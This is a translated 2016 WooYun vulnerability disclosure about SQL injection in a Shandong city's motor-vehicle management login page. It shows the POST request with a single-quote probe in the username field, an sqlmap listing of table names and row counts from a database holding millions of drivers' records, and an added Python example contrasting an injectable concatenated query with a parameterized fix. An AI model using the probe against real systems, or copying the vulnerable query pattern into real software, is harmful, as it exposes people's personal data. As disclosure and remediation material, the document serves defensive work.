
Vulnerability summary (24 followers)

Defect ID: wooyun-2016-0171954

Title: SQL injection in a motor-vehicle system of a city in Shandong Province (exposes 7 million (700W) drivers' records / a large volume of data / extensive personal information)

Vendor: a motor-vehicle system of a city in Shandong Province

Author: 路人甲

Submitted: 2016-01-22 17:13

Fixed: 2016-03-08 21:29

Disclosed: 2016-03-08 21:29

Vulnerability type: SQL injection

Severity: High

Self-assessed Rank: 15

Status: handed to a third-party partner organization (First Research Institute of the Ministry of Public Security) for handling

Source: http://www.wooyun.org; for questions or help contact [email protected]

Tags:



Vulnerability details

Disclosure status:

2016-01-22: details sent to the vendor, awaiting the vendor's handling
2016-01-25: vendor confirmed; details visible to the vendor only
2016-02-04: details opened to core white hats and domain experts
2016-02-14: details opened to regular white hats
2016-02-24: details opened to intern white hats
2016-03-08: details opened to the public

Brief description:

Detailed description:

http://**.**.**.**/login.html, the login page of the Qingdao motor-vehicle management platform, has a POST injection that reaches multiple databases and the personal information of 7 million (700W) drivers. sqlmap ran too slowly, so only a few tables were enumerated as proof. The data involved covers 7 million (700W) personal records and more than 10 million (1000W+) account records.

Vulnerability proof:

POST /login HTTP/1.1
Host: **.**.**.**
Content-Length: 45
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Origin: http://**.**.**.**
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.122 Safari/537.36 SE 2.X MetaSr 1.0
Content-Type: application/x-www-form-urlencoded
Referer: http://**.**.**.**/login.html
Accept-Encoding: gzip,deflate
Accept-Language: zh-CN,zh;q=0.8
Cookie: JSESSIONID=AC7D70A92BB1F74CE95AD8189224A68F; Hm_lvt_0ed52a43cd7f443cd0fa7b719c4f89d7=1453449764; Hm_lpvt_0ed52a43cd7f443cd0fa7b719c4f89d7=1453449764
username=aaa%27&password=aaaa&verifycode=ylao

POST request (above); the injection point is the `username` field, sent with a trailing single quote.

Database: DFO
+-----------------------------+---------+
| Table | Entries |
+-----------------------------+---------+
| PRO_TRAININFO | 18376655 |
| STU_TRAININFO_16_01 | 18173603 |
| STU_TRAININFO_15_07 | 16242461 |
| STU_TRAININFO_15_06 | 15847453 |
| STU_TRAININFO_15_05 | 15456639 |
| STU_TRAININFO_15_04 | 15067229 |
| STU_TRAININFO_15_03 | 14459976 |
| STU_TRAININFO_15_02 | 14218551 |
| STU_TRAININFO_15_01 | 13850649 |
| STU_TRAININFO_14_12 | 13482044 |
| STU_TRAININFO_14_11 | 13115686 |
| STU_TRAININFO_14_10 | 12729705 |
| STU_TRAININFO_14_09 | 12319383 |
| STU_TRAININFO_14_08 | 11898475 |
| STU_TRAININFO_14_07 | 11402647 |
| STU_TRAININFO_14_06 | 10942650 |
| STU_TRAININFO_14_05 | 10480976 |
| STU_TRAININFO_14_04 | 9982631 |
| T_ZC_RK_QDJJ_STUDENT | 6383300 |
| GEN_PRO_STUDENTAPPLY | 5504936 |
| GEN_STUDENTEXAMINFO | 5222804 |
| GEN_BUYCLOCKINFO | 3350069 |
| GEN_PRINTMANAGE | 3317294 |
| GEN_PRO_STUDENTAPPLY_1120 | 2484853 |
| GEN_PRO_STUDENTAPPLY_ZZ | 2441126 |
| GEN_STUDENTEXTINFO | 1542788 |
| GEN_STUDENTINFO | 1542726 |
| PRO_COACHTEACH_14 | 1377524 |
| PRO_COACHTEACH_15 | 1182004 |
| EQU_INCOMEINFO | 1156491 |
| EQU_ICCARDINFO | 1144938 |
| PRO_CARDUSEINFO | 1103038 |
| PRO_COACHTEACH_13 | 1083423 |
| PRO_WXTRAININFO | 1045464 |
| GEN_STUDENTCARDINFO | 1041305 |
| PRO_COACHTEACH_12 | 736027 |
| BILL_PXJLDINFO | 442400 |
| GEN_STUDENTINFO_POLICE | 261659 |
| ONLINE_LOGINFO | 243801 |
| TMP_GEN_PRINTMANAGE | 125503 |
| PRO_COACHTEACH_11 | 90927 |
| STUDENT_1 | 81334 |
| OA_READLOG | 67733 |
| GEN_PRO_RETIREAPPLY | 58165 |
| STU_TRAININFO_12_05 | 57104 |
| PRO_COACHTEACH_16 | 55302 |
| STU_TRAININFO_12_08 | 53558 |
| STU_TRAININFO_12_04 | 52244 |
| PRO_LOCKCARD | 51908 |
| STU_TRAININFO_12_11 | 50787 |
| STU_TRAININFO_12_06 | 50634 |
| STU_TRAININFO_12_07 | 50434 |
| PRO_ICMAKEUPINFO | 49402 |
| STU_TRAININFO_12_12 | 48018 |
| STU_TRAININFO_12_03 | 47141 |
| STU_TRAININFO_12_10 | 46997 |
| STU_TRAININFO_12_09 | 46254 |
| STUDENT | 36655 |
| TEMP_EQU_ICCARD_KEY | 35855 |
| STU_TRAININFO_12_02 | 30955 |
| EQU_DRAWDETAIL | 26409 |
| EQU_DRAWINFO | 25194 |
| BILL_PXJLDINFO_BAKK | 22200 |
| GEN_PRO_AMENDDETAIL | 22090 |
| STU_TRAININFO_13_01 | 21880 |
| GEN_PRO_AMENDINFO | 21012 |
| STU_TRAININFO_11_12 | 20769 |
| STU_TRAININFO_13_08 | 15877 |
| PUB_FINGERINFO | 15676 |
| EQU_POSUSEINFO | 14207 |
| STU_TRAININFO_13_03 | 14002 |
| STU_TRAININFO_12_01 | 13929 |
| STU_TRAININFO_13_07 | 13721 |
| GEN_PRO_STACKINFO | 13313 |
| BILL_PHGL_DETAIL | 13257 |
| STU_TRAININFO_13_09 | 11842 |
| STU_TRAININFO_13_06 | 10287 |
| STU_TRAININFO_13_02 | 10169 |
| DS_TEST | 9060 |
| STU_TRAININFO_13_12 | 8441 |
| BILL_PHGL_MASTER | 8260 |
| SCH_COACHEXTINFO | 8129 |
| SCH_COACHINFO | 8129 |
| STU_TRAININFO_13_10 | 7639 |
| SCH_COACHCARDINFO | 7449 |
| BI_TRAININFO | 7253 |
| SCH_COACHHISTORYINFO | 7010 |
| STU_TRAININFO_14_01 | 6968 |
| STU_TRAININFO_13_11 | 6910 |
| STU_TRAININFO_13_04 | 6835 |
| STU_TRAININFO_14_03 | 6772 |
| STU_TRAININFO_11_11 | 6694 |
| STU_TRAININFO_13_05 | 6612 |
| EQU_POSINFO | 6550 |
| SCH_COACHTEACHCARTYPE | 6258 |
| SYS_ROLEPOWER | 6116 |
| GEN_STUDENTSOURCE_CHANGELOG | 6078 |
| STU_TRAININFO_14_02 | 5737 |
| SCH_SCHOOLCARINFO | 5456 |
| PRO_LOCKCARD_BAK20120709 | 5279 |
| TEMP_1 | 4353 |
| SCH_CHECKMANINFO | 4352 |
| TMP_POS | 4325 |
| SCH_SCHOOLCARINFO_BAK | 4261 |
| STU_TRAININFO_15_08 | 3621 |
| SCH_PRO_COACHAPPLY | 3465 |
| OA_MESSAGEOBJECT | 3267 |
| STU_TRAININFO_15_09 | 2491 |
| STU_TRAININFO_15_10 | 1971 |
| SYS_LOGINFO | 1822 |
| STU_TRAININFO_11_10 | 1818 |
| STU_TRAININFO_15_11 | 1797 |
| SCH_SCHOOLCARPDINFO | 1748 |
| T_ZC_RK_QDJJ_EXAM | 1375 |
| GEN_STUDENTEXAMSCORE | 1310 |
| SCH_TUITIONINFO | 1245 |
| QUEST_SOO_EVENT_CATEGORIES | 1244 |
| STU_TRAININFO_15_12 | 1171 |
| STUDENT_3 | 1069 |
| SCH_COA_VALIDDATE_LOG | 811 |
| OA_MESSAGEINFO | 625 |
| PRO_TRAININFO_141114 | 610 |
| OA_ATTACHMENTINFO | 509 |
| EQU_POWERINFO | 498 |
| SYS_PRINT_ZZDY | 430 |
| SYS_PRINT_ZZDY_141125 | 420 |
| COA_CARDSETLOG | 386 |
| SYS_FUNINFO | 317 |
| SCH_SECONDCOACHINFO | 271 |
| SYS_USERROLE | 256 |
| SYS_USERPORTAL | 241 |
| SYS_USERINFO | 230 |
| SYS_DICTIONARY | 127 |
| SYS_MENUINFO | 127 |
| SYS_ROLEINFO | 121 |
| EQU_STEPPEDUPINFO | 93 |
| STUDENT_5 | 84 |
| SYS_POLICE_DICTIONARY | 76 |
| SCH_SCHOOLEXTINFO | 69 |
| SCH_SCHOOLINFO | 69 |
| PRO_TRAINBILLPARAM | 64 |
| TEACH_EXAMPERIOD | 64 |
| TEACH_EXAMPERIOD_20150318 | 64 |
| SYS_KEYVALUE | 57 |
| BILL_PHGL_DETAIL_BAKK | 55 |
| BILL_PHGL_MASTER_BAKK | 55 |
| SCH_COA_OVERAGE_LOG | 49 |
| STUDENT_2 | 39 |
| GEN_STUDENPRESIGN | 38 |
| TEACH_COD_TEACHTYPE | 25 |
| PBCATEDT | 21 |
| PBCATFMT | 20 |
| TEACH_TARIFF | 17 |
| TEACH_DRIVECARPARAM | 16 |
| TEACH_DRIVECARTYPE | 16 |
| SYS_PARAMINFO | 14 |
| SYS_DEPTINFO | 12 |
| EQU_DEVICEINITRECORD | 9 |
| SYS_AREAINFO | 9 |
| EQU_MATERIELINFO | 6 |
| EQU_STORAGEINFO | 6 |
| GEN_PRO_AMENDPARA | 6 |
| SCH_SCHOOLLICENCE | 4 |
| TEACH_EXAMSUBJECTINFO | 4 |
| TEACH_PRICEPARAM | 4 |
| GEN_PRO_STUDENTAPPLY_3GZZ | 2 |
| EQU_PARAMINFO | 1 |
| EQU_UPDATEFILEINFO | 1 |
| INF_DBLINK | 1 |
| PRO_WRITELOG | 1 |
| QUEST_SOO_PARSE_TIME_TRACK | 1 |
| QUEST_SOO_VERSION | 1 |
| SCH_SCHOOLMANAGERS | 1 |
| SCH_SCHOOLPLACEINFO | 1 |
+-----------------------------+---------+

Screenshots attached to the original report (not reproduced here): 11111.png, db.png, 22222.png, 33333.png, 44444.png

Fix suggestion:
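The report leaves the fix section empty. As an added example that is not part of the original report, the block below puts the login-query pattern that produces the behaviour described above (a single quote in `username` breaks the statement and surfaces a database error, which is what the `username=aaa%27` probe relies on) next to a parameterized query that treats the same input as plain data. The table is named after the `SYS_USERINFO` entry in the sqlmap listing, but its columns, the sample row, the plaintext password comparison and the SQLite backend are all constructed for this example; nothing else about the real platform's schema or code is known from the report.

```python
import sqlite3


def make_db():
    """Constructed sample login store (in-memory SQLite); columns and row are invented."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE sys_userinfo (username TEXT, password TEXT)")
    # Real systems compare a password hash; plaintext here only keeps the query logic visible.
    conn.execute("INSERT INTO sys_userinfo VALUES ('admin', 'example-secret')")
    return conn


def login_vulnerable(conn, username, password):
    """The defective pattern: request fields are concatenated into the SQL text.

    A quote in `username` changes the statement's structure, so the database
    raises a syntax error instead of returning a normal 'no such user' result.
    """
    sql = ("SELECT COUNT(*) FROM sys_userinfo WHERE username = '"
           + username + "' AND password = '" + password + "'")
    return conn.execute(sql).fetchone()[0] == 1


def login_parameterized(conn, username, password):
    """Hardened form: placeholders in the SQL text, values passed separately.

    The driver never splices the values into the statement, so a quote in the
    input is just a character in the compared string.
    """
    sql = "SELECT COUNT(*) FROM sys_userinfo WHERE username = ? AND password = ?"
    return conn.execute(sql, (username, password)).fetchone()[0] == 1


def probe(login, conn, username, password):
    """Classify a login attempt: 'ok', 'denied', or 'sql_error' if the input broke the query.

    'sql_error' on a quoted username is exactly the signal that marks the
    concatenated version as injectable; the parameterized version never yields it.
    """
    try:
        return "ok" if login(conn, username, password) else "denied"
    except sqlite3.OperationalError:
        return "sql_error"


if __name__ == "__main__":
    db = make_db()
    # The report's probe value: username=aaa' (URL-encoded as aaa%27), password=aaaa.
    for name, fn in (("vulnerable", login_vulnerable), ("parameterized", login_parameterized)):
        print(name, "aaa'/aaaa ->", probe(fn, db, "aaa'", "aaaa"))
        print(name, "admin/example-secret ->", probe(fn, db, "admin", "example-secret"))
```

Running the block shows the two versions agreeing on a valid credential and disagreeing on the quoted username: the concatenated query reports `sql_error`, the parameterized one simply reports `denied`. On the server side the fix is the parameterized statement in whatever data-access layer the platform uses, plus not returning database error text to the client; in application logs, database syntax errors triggered from the login handler are the event worth alerting on, since that is the behaviour the report's proof depends on.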

Copyright notice: when reposting, credit the source 路人甲@乌云


Vulnerability response

Vendor response:

Severity: Medium

Vulnerability Rank: 8

Confirmed: 2016-01-25 15:19

Vendor reply:

Thanks for the submission!!
Verified and confirmed the described issue; the operator has been notified to fix it.

Latest status:

None yet